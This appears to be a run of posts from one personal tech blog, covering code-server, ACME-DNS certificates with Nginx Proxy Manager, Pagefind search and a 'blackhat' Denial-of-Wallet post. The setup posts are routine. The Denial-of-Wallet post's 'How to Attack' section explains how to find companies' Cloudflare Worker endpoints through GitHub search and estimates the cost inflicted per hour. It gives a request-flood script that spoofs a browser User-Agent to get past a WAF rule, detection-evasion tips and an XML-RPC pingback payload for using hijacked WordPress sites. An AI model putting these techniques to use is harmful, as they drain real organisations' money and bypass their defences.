In the fast-paced world of software development, flexibility and efficiency are paramount. Enter code-server, an innovative tool that allows you to run Visual Studio Code (VS Code) in your browser, bringing a seamless and consistent development environment to any device, anywhere.
Whether you’re working on a powerful desktop, a modest laptop, or even a tablet (pls don’t!), code-server ensures you have access to your development environment at all times. Here’s an in-depth look at what makes code-server a game-changer.
What is code-server?
code-server is an open-source project that enables you to run VS Code on a remote server and access it via your web browser. This means you can:
• Work on any device with an internet connection.
• Leverage the power of cloud servers to handle resource-intensive tasks.
• Maintain a consistent development environment across devices.
With over 69.2k stars on GitHub, code-server has gained significant traction among developers, teams, and organizations looking for efficient remote development solutions.
Why would you use code-server?
1. Flexibility Across Devices
Imagine coding on your laptop, switching to a tablet, or even a Chromebook, without missing a beat. With code-server, your development environment follows you wherever you go—seamlessly.
2. Offloading Performance to the Server
Running resource-intensive tasks on a server instead of your local machine? Yes, please! Whether you’re working on complex builds or handling large datasets, code-server takes the heavy lifting off your device and onto the server.
3. Bringing Your Dev Environment Closer to LLMs
With the rise of large language models (LLMs), working near powerful servers hosting these models has become a necessity. No more downloading terabytes of data just to test integrations locally. Code-server simplifies this by placing your environment right where the action is.
4. Because I Can! 🥳
As a coder and IT enthusiast, sometimes the best reason is simply: Because I can! Sure, you could run local VSCode with “Remote Development” extensions or install it directly on a Chromebook—but where’s the fun in that? 😉
5. Streamlined Backup and File Management
One of my favorite aspects? Developing directly on a remote system where my regular backup processes already take care of everything. No extra steps, no worries—just peace of mind knowing my work is secure.
I mostly did it just to do it: I use code-server to manage all my Proxmox scripts and to develop little sysadmin tools. You also get a nice web shell.
Installation
Requirements
Before diving in, make sure your system meets the minimum requirements:
• Linux machine with WebSockets enabled. (this is important to know when you use a reverse proxy)
• At least 1 GB RAM and 2 vCPUs.
I think you can get away with 1 vCPU; mine is bored most of the time. Obviously, running resource-intensive code will eat more.
There are multiple ways to get started with code-server, but I chose the easiest one:
Bash
curl -fsSL https://code-server.dev/install.sh | sh
This script ensures code-server is installed correctly and even provides instructions for starting it. As always, never run a script piped from the internet like this without checking it first.
Configuration
After installation, you can customize code-server for your needs. Explore the setup and configuration guide to tweak settings, enable authentication, and enhance your workflow.
Bash
nano ~/.config/code-server/config.yaml
That is where you will find the password to access code-server and you can also change the port:
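For reference, a freshly generated config.yaml looks like this (the password below is a placeholder; yours is generated for you):

```yaml
bind-addr: 127.0.0.1:8080
auth: password
password: your-generated-password
cert: false
```

Change `bind-addr` if you want code-server to listen on another interface or port, e.g. behind your reverse proxy.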
Today, I’m going to show you how you can obtain real, trusted SSL certificates for your home network or even a public website. Using this method, you can achieve secure HTTPS for your web services with certificates that browsers recognize as valid. Fun fact: the very website you’re reading this on uses this same method!
This guide focuses on using ACME-DNS with Nginx Proxy Manager (NPM), a popular reverse proxy solution with a user-friendly web interface. Whether you’re setting up a self-hosted website, Nextcloud, or any other service, this approach can provide you with certificates signed by a trusted Certificate Authority (CA) for your home network or the public.
Prerequisites
I am assuming you are on a Debian-based Linux distribution (I will use a Debian 12 LXC). This should work on any host supporting Docker though.
You should have some knowledge of Docker and Docker Compose and it should be installed. You can find a step by step guide here.
You need your own domain. I get mine from Namecheap but any provider works. (I usually change the Nameserver to Cloudflare and manage them there since Namecheap is cheaper to buy)
Please make sure you have these packages installed:
Bash
apt install curl jq nano
(Yep, I like nano. Feel free to use your editor of choice.)
For our installation we will be using Docker with Docker Compose:
docker-compose.yml
services:
  npm:
    image: 'jc21/nginx-proxy-manager:latest'
    restart: unless-stopped
    ports:
      - '443:443'
      - '81:81' # Admin Port
      # - '80:80' # not needed in this setup
    volumes:
      - ./data:/data
      - ./letsencrypt:/etc/letsencrypt
      # - ./custom-syslog.conf:/etc/nginx/conf.d/include/custom-syslog.conf
I only like to expose port 443; since we will be using ACME-DNS, we will not need 80. Port 81 will be exposed for now, but once everything is configured we will remove this too.
Now just run “docker compose up -d” in the directory containing the docker-compose.yml and you will be able to log in via http://your-ip:81 (replace “your-ip” with the actual IP of your machine; you can try http://127.0.0.1:81 if it runs locally).
Next, register an account with the public ACME-DNS instance, for example with “curl -s -X POST https://auth.acme-dns.io/register | jq”. Please take note of the output and copy it to a file or note-taking tool for later.
We will need to edit this a little. If you are setting this up for your home network, it is usually a good idea to use a subdomain and a wildcard certificate; this will enable you to secure anything under that subdomain.
There should be a “data” directory in your current one from the docker command earlier. We will create a JSON config file for Nginx Proxy Manager, you can name it whatever you want.
Bash
ls # check if "data" dir exists
cd data
nano acme_your_domain.json # use your domain name, but the name does not matter
In this file you will need to paste the config. I suggest using a subdomain like “home”.
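As a sketch, the edited file ends up keyed by the wildcard domain, with the credentials from your registration output pasted in. The field names follow the ACME-DNS registration response; treat the exact layout as an assumption and adjust it to what your registration actually returned:

```json
{
  "*.home.your-domain.com": {
    "username": "<username from register output>",
    "password": "<password from register output>",
    "fulldomain": "<fulldomain from register output>.auth.acme-dns.io",
    "subdomain": "<subdomain from register output>",
    "allowfrom": []
  }
}
```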
It is important to note that with a wildcard like this you cannot do something like “plex.media.home.your-domain.com”; you can only use the specified level of subdomain. If you did want a “sub-sub” domain, you would need to use “*.media.home.your-domain.com” and so on.
A note on the “allowfrom”: [] field. If you have a static IP that you will always be coming from, restricting this is a good idea. Since this guide focuses on SSL for your home network, you most likely have a dynamic IP, which will work until it changes, so probably for 24 hours or a week.
Configuring DNS Records
You need to add records both at your registrar (or wherever your DNS is hosted) and in your local DNS server. I am using Cloudflare.
Cloudflare
Go to “your Domain -> DNS -> Records”. There you will need to add a CNAME record.
In the “Name” field put “_acme-challenge.YOUR-SUBDOMAIN”; with our example subdomain “home”, that is “_acme-challenge.home”. In the “Target” field you put the “fulldomain” from your config, like “XXXX040a-XXXX-XXXX-XXXX-XXXXf8525a11.auth.acme-dns.io”. Leave “Proxy status” on “DNS only”.
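In text form, the record boils down to this (values are examples; use your own subdomain and the fulldomain from your registration output):

```
Type:    CNAME
Name:    _acme-challenge.home
Target:  <fulldomain from your registration>.auth.acme-dns.io
Proxy:   DNS only
```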
(If you are doing a public and not home-only setup, you would also add an A, AAAA or CNAME record pointing to your public IP. For a home setup you do not need this.)
Local DNS
The devices in your network need to know that your reverse proxy, aka Nginx Proxy Manager, is handling “*.home.your-domain.com”, so you need to add this to your local DNS server: whenever someone goes to “*.home.your-domain.com”, they are directed to your proxy. Whether you do this in a Pi-hole, AdGuard, pfSense, OPNsense or in your router varies; technically you could even edit the hosts file of each device. I am using a Unifi Dream Machine:
In your dream machine go to: /network/default/settings/routing/dns
There you create a new entry like so:
Please use your configured domain and the IP of your system.
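In text form, the entry amounts to a wildcard record along these lines (domain and IP are examples):

```
*.home.your-domain.com  ->  192.168.1.10   (the IP of the machine running Nginx Proxy Manager)
```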
Bringing it all together
All we need to do now is configure our setup in Nginx Proxy Manager. Go to your admin interface at http://your-ip:81/nginx/certificates, then click on “Add SSL Certificate” and choose “Let’s Encrypt”.
There is a lot going on here but I will explain:
In “Domain Names” enter the domains you have configured
Enter your E-Mail Address
Choose “ACME-DNS” in the Provider menu
In the API URL enter “https://auth.acme-dns.io”
The registration file is the JSON file we created earlier. Enter whatever you called it; the path “/data/” should be fine if you followed all the steps.
Leave propagation empty
Finally just agree and save.
Your new certificate will pop up once the loading screen goes away.
It should look like this:
By the way, I have a profile image because I used my Gravatar email address for the admin login.
Securing the Nginx Proxy Manager Admin
Now that we have a certificate let us use it directly on our admin interface.
Add a new proxy host. Enter the domain of your choosing (you need to change “your-domain.com”). Since Nginx Proxy Manager is accessing itself inside the Docker network, the hostname is “npm”, its service name from the “docker-compose.yml” at the beginning.
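The fields on the “Details” tab end up roughly like this (the domain is an example; the admin UI speaks plain HTTP on port 81 inside the container):

```
Domain Names:           npm.home.your-domain.com
Scheme:                 http
Forward Hostname / IP:  npm
Forward Port:           81
```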
Under the “SSL” tab just choose your created certificate.
You do not have to choose the options for Force SSL, HTTP/2 and Block Common Exploits for this to work.
Okay now press Save and test!
If it works you can now remove the port from the compose:
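In the docker-compose.yml from the beginning, that just means commenting out (or deleting) the admin port and re-running “docker compose up -d”:

```yaml
    ports:
      - '443:443'
      # - '81:81' # Admin Port, now reached through the proxy itself
```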
Now you can access your Nginx Proxy Manager admin interface via your new domain with a trusted SSL certificate.
Conclusion
Using ACME-DNS with Nginx Proxy Manager is a powerful way to obtain SSL certificates for your home network or website. It simplifies the process of handling DNS challenges and automates certificate issuance for secure HTTPS. You also will no longer have to expose your local services to the internet to get new certificates.
By following this guide, you’ve gained the tools to secure your online services with minimal hassle. Stay tuned for more tips on managing your self-hosted environment, and happy hosting!
In the fast-paced world of cyber warfare, attackers are always on the hunt for new ways to hit where it hurts – both in the virtual world and the wallet. The latest trend? Denial-of-Wallet (DoW) attacks, a crafty scheme aimed at draining the bank accounts of unsuspecting victims.
Serverless setups, touted for their flexibility and scalability, have become prime targets for these digital bandits. But fear not! Here’s your crash course in safeguarding your virtual vaults from these costly exploits.
What’s a DoW attack, anyway?
Think of it as the mischievous cousin of the traditional denial-of-service (DoS) onslaught. While DoS attacks aim to knock services offline, DoW attacks have a more sinister agenda: draining your bank account faster than you can say “cloud computing.”
Unlike their DDoS counterparts, DoW attacks zero in on serverless systems, where users pay for resources consumed by their applications. This means that a flood of malicious traffic could leave you with a bill so hefty, it’d make Scrooge McDuck blush.
But wait, there’s more!
With serverless computing, you’re not just outsourcing servers – you’re also outsourcing security concerns. If your cloud provider drops the ball on protection, you could be facing a whole buffet of cyber threats, not just DoW attacks.
Detecting & Protecting
Now, spotting a DoW attack isn’t as easy as checking your bank statement. Sure, a sudden spike in charges might raise eyebrows, but by then, the damage is done. Instead, take proactive measures like setting up billing alerts and imposing limits on resource usage. It’s like putting a lock on your wallet before heading into a crowded marketplace.
And let’s not forget about securing those precious credentials. If an attacker gains access to your cloud kingdom, they could wreak havoc beyond just draining your funds – we’re talking file deletions, instance terminations, the whole nine yards. So buckle up with least privilege services, multi-factor authentication, and service control policies to fortify your defenses.
In the arms race between cyber crooks and cloud defenders, staying one step ahead is key. So, arm yourself with knowledge, fortify your defenses, and may your cloud budgets remain forever full!
How to Attack
This is what you came here for, isn’t it? Before I go on I would like to remind you of my Disclaimer.
Cloudflare
First of all, big shoutout to Cloudflare for actually providing a valuable free tier of services (they do not pay me or anything, I actually like them a lot).
Basically, they provide serverless functions called “Cloudflare Workers”, their endpoints usually look like this: worker-blah-blah-1337.blah.workers.dev You can also choose your own custom domain, but the default route is still enabled. I recommend you disable it, or else…well stay tuned.
CPU time: (7 ms of CPU time per request × 100,000,000 requests − 30,000,000 included CPU ms) / 1,000,000 × $0.02 = $13.40
Total
$45.40
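As a sanity check, here is that bill computed in Python. The CPU-time formula is from the text; the $5 base fee, the 10 million included requests and the $0.30 per additional million requests are my assumption of Cloudflare’s paid Workers pricing at the time, so treat them as illustrative:

```python
# Cloudflare Workers paid-plan bill for 100M requests at 7 ms CPU each.
# Included allowances and unit prices are assumptions (see above).
requests_made = 100_000_000
cpu_ms_per_request = 7

# CPU time: everything past the 30M included CPU-ms costs $0.02 per million
cpu_ms_used = requests_made * cpu_ms_per_request
cpu_cost = (cpu_ms_used - 30_000_000) / 1_000_000 * 0.02

# Requests: everything past the 10M included requests costs $0.30 per million
request_cost = (requests_made - 10_000_000) / 1_000_000 * 0.30

base_fee = 5.00
total = base_fee + request_cost + cpu_cost

print(f"CPU cost:     ${cpu_cost:.2f}")
print(f"Request cost: ${request_cost:.2f}")
print(f"Total:        ${total:.2f}")
```

With those assumed rates the parts add up exactly: $13.40 CPU + $27.00 requests + $5.00 base = $45.40.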
They actually mention denial-of-wallet attacks and how you can counter them, or at least lessen the impact.
Finding Cloudflare Workers
One of the easiest ways to find endpoints is GitHub, using a simple query like ?q=workers.dev&type=code or ?q=workers.dev&type=commits. As I am writing this I found 121,000 lines of code that include workers.dev; subtract some duplicates and maybe you end up with 20,000, some of them belonging to pretty big companies as well.
A tool like Plow, an HTTP(S) benchmarking tool, can do about 1,000,000 requests per 10 seconds on a normal machine using 20 connections. Playing around with the settings you can probably get a lot more, but it depends on many factors like bandwidth and internet speed. So in theory you could cost your target $120 per hour from your home PC/laptop. If you got 3 of your friends involved, you could cost your target almost $500 per hour. Running such a script 24/7 then costs your target roughly $12,000 a day, or $84,000 a week. Now if you’re attacking an enterprise that may not even be that bad for them, but imagine a small company paying 12k every day. As I explained above, there is also no going back: that compute is consumed and will be charged. Depending on whether they use something like KV and other services, you can multiply these numbers. A pretty common pattern is to have one Worker act as an API gateway, so one request could actually trigger up to 50-100 sub-requests.
If, by just reading this, you feel bad, then congrats 🎉, you are probably one of the good guys, girls or anything in between.
Back to reality
Cloudflare being Cloudflare, they obviously have pretty good protections as is, in my experience better than AWS or Azure. So simply running a tool and hoping for carnage will not get you far.
Some additional protections Cloudflare provides are:
Being able to do all this easily for free, including their free DDoS protection, should build up a nice barrier against such attacks. Looking at the bigger picture, it is actually crazy that this can all be done for free; on AWS you would have to pay extra for all of these features and essentially denial-of-wallet yourself (😁).
Any protection is only good if it is enabled and configured correctly. I am using the following WAF rule, for example:
(not http.user_agent contains "Mozilla/5.0")
This basically blocks everything that is not advertising itself as a browser. If you know a little tiny bit about how User Agents work, you know that getting around this rule is super simple. You would just need to write a script like this:
Python
import requests

url = 'SOME PROTECTED URL'
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
}

# run 100 million requests with a timeout of one second
for i in range(1, 100000000):
    requests.get(url, timeout=1, headers=headers)
Now my simple filter rule thinks it is a browser and will let it through.
Check out my 24h WAF statistic:
As you can see most of the bots and scripts are blocked by this stupid simple rule. I am not showing you the rest of the rules, because I am literally explaining to you how you could get around my defenses, usually not a great idea on a post tagged #blackhat.
Real world attack
In a real-world attack you will need residential proxies or multiple IPs with a high reputation. You then write a more advanced tool that automates a browser, otherwise you will be detected very quickly. Even better if you use something like undetected_chromedriver for more success.
Obviously you also want to add random waits, a script being run every second will light up like a christmas tree:
Python
from random import randint
from time import sleep

sleep(randint(0, 5))
(You could just send as many requests as you want and let your hardware or internet connection add “organic” random waits, but this will ultimately lead to you getting blocked for making too many requests too fast.)
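Putting the two snippets together, a slow-drip loop might look like this sketch; `send` stands in for whatever actually fires the request (e.g. the `requests.get` call from the earlier script):

```python
import random
import time

def jitter(max_s=5):
    # random pause length in seconds, so the traffic has no fixed beat
    return random.randint(0, max_s)

def slow_drip(send, n, max_s=5):
    """Call send() n times with a random pause between calls."""
    for _ in range(n):
        send()
        time.sleep(jitter(max_s))
```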
You will need more machines with more residential IPs, as this will be a lot slower, but you will slowly drain your target’s wallet this way. In the end you could have this running on something like a Raspberry Pi, costing you next to nothing in electricity while slowly attacking your target; depending on their setup, each single request from your side could be 50 on theirs.
One other cool trick, which is actually still possible, is to hijack WordPress websites that have xmlrpc.php enabled. This is called an XML-RPC Pingback Attack and is as simple as:
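As a sketch of what that request looks like (both URLs are hypothetical), the body such an attack POSTs to the hijacked blog’s /xmlrpc.php can be built with the standard library; the blog then fetches the victim URL to “verify” the pingback:

```python
import xmlrpc.client

# Hypothetical URLs: the endpoint you want hammered (sourceURI) and an
# existing post on the hijacked WordPress site (targetURI).
victim = "https://victim.example.com/expensive-endpoint"
wp_post = "https://hijacked-wordpress.example.com/?p=1"

# XML-RPC request body for pingback.ping(sourceURI, targetURI)
payload = xmlrpc.client.dumps((victim, wp_post), methodname="pingback.ping")
print(payload)
```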
As this post is getting longer, I decided to end it here. These attacks work on any cloud-based “serverless” provider that bills by usage. The key idea is to use as many of a company’s “billed by usage” endpoints as possible.
In theory this can do a lot of damage; in practice you will have to do a little more than just send a billion requests, as fast as possible with some script, to an endpoint. I highlighted some ways to get around protections above, but you will most likely have to come up with your own new/custom solution in order to outsmart your target.
Why Cloudflare?
I picked Cloudflare as an example because I use them for everything and really like them. (Again, I am not paid to say this; I actually like them.) This attack works on any other provider as well; it will probably work the least on Cloudflare, thanks to their free DDoS protection.
Compared to that, on AWS the WAF alone would cost as much as the Cloudflare Workers usage itself, so actually getting through the AWS WAF and then hammering a Lambda function, maybe even one that reads some data from S3, would be disastrous.
Hey there, web wizards and code conjurers! Today, I’m here to spill the beans on a magical tool that’ll have you searching through your static site like a pro without sacrificing your users’ data to the digital overlords. Say goodbye to the snooping eyes of Algolia and Google, and say hello to Pagefind – the hero we need in the wild world of web development!
Pagefind
So, what’s the deal with Pagefind? Well, it’s like having your own personal search genie, but without the need for complex setups or sacrificing your site’s performance. Here’s a quick rundown of its enchanting features straight from the Pagefind spellbook:
Multilingual Magic: Zero-config support for sites that speak many tongues.
Filtering Sorcery: A powerful filtering engine for organizing your knowledge bases.
Custom Sorting Spells: Tailor your search results with custom sort attributes.
Metadata Mysticism: Keep track of custom metadata for your pages.
Weighted Wand Wielding: Adjust the importance of content in your search results.
Section Spellcasting: Fetch results from specific sections of your pages.
Domain Diving: Search across multiple domains with ease.
Index Anything Incantation: From PDFs to JSON files, if it’s digital, Pagefind can find it!
Low-Bandwidth Brilliance: All this magic with minimal bandwidth consumption – now that’s some serious wizardry!
Summoning Pagefind
Now, let’s talk about summoning this mystical tool onto your Astro-powered site. It’s as easy as waving your wand and chanting npx pagefind --site "dist". Poof! Your site’s now equipped with the power of search!
With a flick of your build script wand, you’ll integrate Pagefind seamlessly into your deployment pipeline. Just like adding a secret ingredient to a potion, modify your package.json build script to include Pagefind’s magic words.
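For an Astro site that builds into dist, the build script ends up along these lines (script names assumed from a standard Astro project):

```json
{
  "scripts": {
    "build": "astro build && pagefind --site dist"
  }
}
```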
Now my site is not that big yet, but 0.043 seconds is still very fast, and if you are paying for build time, it costs next to nothing. Pagefind, being written in Rust, is very efficient.
Getting Cozy with Pagefind’s UI
Alright, so now you’ve got this powerful search engine at your fingertips. But wait, what’s this? Pagefind’s UI is a bit… opinionated. Fear not, fellow sorcerers! With a dash of JavaScript and a sprinkle of CSS, we’ll make it dance to our tune!
Weaving a custom UI spell involves a bit of JavaScript incantation to tweak placeholders and buttons just the way we like them. Plus, with a bit of CSS wizardry, we can transform Pagefind’s UI into something straight out of our own enchanting design dreams!
/pagefind/pagefind-ui.js is Pagefind-specific JavaScript. In the future I plan to reverse it, as there is a lot of unnecessary code in there.
I am using astro:page-load as an event listener since I am using view transitions.
Embrace Your Inner Stylist
Ah, but crafting a unique style for your search UI is where the real fun begins! With the power of TailwindCSS (or your trusty CSS wand), you can mold Pagefind’s UI to fit your site’s aesthetic like a bespoke wizard robe.
With a little imagination and a lot of creativity, you’ll end up with a search UI that’s as unique as your magical incantations.
(@apply is TailwindCSS specific, you can use regular CSS if you please)
And there you have it, folks – the mystical journey of integrating Pagefind into your static site, complete with a touch of your own wizardly flair!
Now go forth, weave your web spells, and may your users’ search journeys be as magical as your coding adventures! 🧙✨
Where to go from here
I gave you a quick look into building a simple static site search. In my opinion the JavaScript files from Pagefind should be slimmed down to work, in my case for Astro; the CSS should be applied by you, and Pagefind should just leave you a simple unstyled search. I am sure they would be happy if someone helped them out by doing this.
I was thinking about hosting my index on a Cloudflare Worker, then styling my search form however I want and just hooking up the Worker endpoint with the form, basically like a self-hosted Algolia. An alternative to Pagefind could be Fuse.js; the drawback is that you would have to build your own index.
This post was originally posted on 17 Mar 2024 on my Cybersecurity blog.